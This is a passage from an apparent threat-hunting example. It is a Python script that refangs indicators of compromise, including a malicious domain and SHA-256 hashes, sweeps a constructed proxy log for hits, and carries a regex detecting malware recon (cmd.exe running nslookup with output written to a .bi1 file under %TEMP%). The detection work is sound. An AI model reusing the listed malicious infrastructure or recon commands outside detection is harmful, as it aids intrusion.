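    "https://pomidom[.]com",
]
SHA256_HASHES = [
    "42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d",
    "79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041",
    "92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c",
    "84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e",
]


def refang(value: str) -> str:
    """Undo the usual defanging: '[.]' -> '.', leading 'hxxp' -> 'http'."""
    value = value.strip().replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)


def build_indicators():
    """Return (ips, domains, hashes) as sets ready for exact matching."""
    ips = {refang(v) for v in DEFANGED_IPS}
    domains = {urlsplit(refang(u)).hostname.lower() for u in DEFANGED_URLS}
    # Keep only well-formed SHA-256 strings so a typo cannot silently match nothing.
    hashes = {h.lower() for h in SHA256_HASHES if re.fullmatch(r"[0-9a-fA-F]{64}", h)}
    return ips, domains, hashes


def host_matches(host: str, domains: set) -> bool:
    """True if host is an indicator domain or any subdomain of one."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in domains for i in range(len(labels)))


def known_bad_hash(sha256: str, hashes: set) -> bool:
    return sha256.strip().lower() in hashes


# Constructed proxy log format: "<ts> <client> -> <dest_ip> host=<fqdn> uri=<path>"
PROXY_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>\S+) host=(?P<host>\S+) uri=(?P<uri>\S+)$")


def sweep_proxy_log(lines, ips, domains):
    """Return [(line, reason)] for every line touching an indicator IP or domain."""
    hits = []
    for line in lines:
        m = PROXY_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        if m["dst"] in ips:
            hits.append((line, "ip:" + m["dst"]))
        elif host_matches(m["host"], domains):
            hits.append((line, "domain:" + m["host"]))
    return hits


# The sandbox trace above shows cmd.exe running nslookup and echo with output
# redirected into a <hex>.bi1 file under %TEMP%; this regex matches that shape.
BI1_RECON_RE = re.compile(
    r'cmd(?:\.exe)?\s+/c\s+".*>\s*\S*\\Temp\\[0-9A-F]+\.bi1"', re.IGNORECASE)


def is_bi1_recon(cmdline: str) -> bool:
    return BI1_RECON_RE.search(cmdline) is not None


SAMPLE_PROXY_LOG = [  # constructed for this example
    "2018-08-24T10:00:01Z 10.0.0.5 -> 185.212.47.9 host=pool.jfklandscape.com uri=/",
    "2018-08-24T10:00:07Z 10.0.0.5 -> 93.184.216.34 host=www.example.com uri=/index.html",
    "2018-08-24T10:01:15Z 10.0.0.9 -> 203.0.113.7 host=cdn.beard-style.com uri=/x",
    "2018-08-24T10:02:40Z 10.0.0.9 -> 198.54.116.126 host=englandlistings.com uri=/pagverd75.php",
]

if __name__ == "__main__":
    ioc_ips, ioc_domains, ioc_hashes = build_indicators()
    for hit_line, why in sweep_proxy_log(SAMPLE_PROXY_LOG, ioc_ips, ioc_domains):
        print(f"HIT {why}: {hit_line}")
```

The domain check deliberately matches subdomains of a listed name but not parents of it: `cdn.beard-style.com` hits `beard-style.com`, while `jfklandscape.com` alone does not hit `pool.jfklandscape.com`, since the post lists only the `pool` host. Running it prints three hits from the four constructed proxy lines.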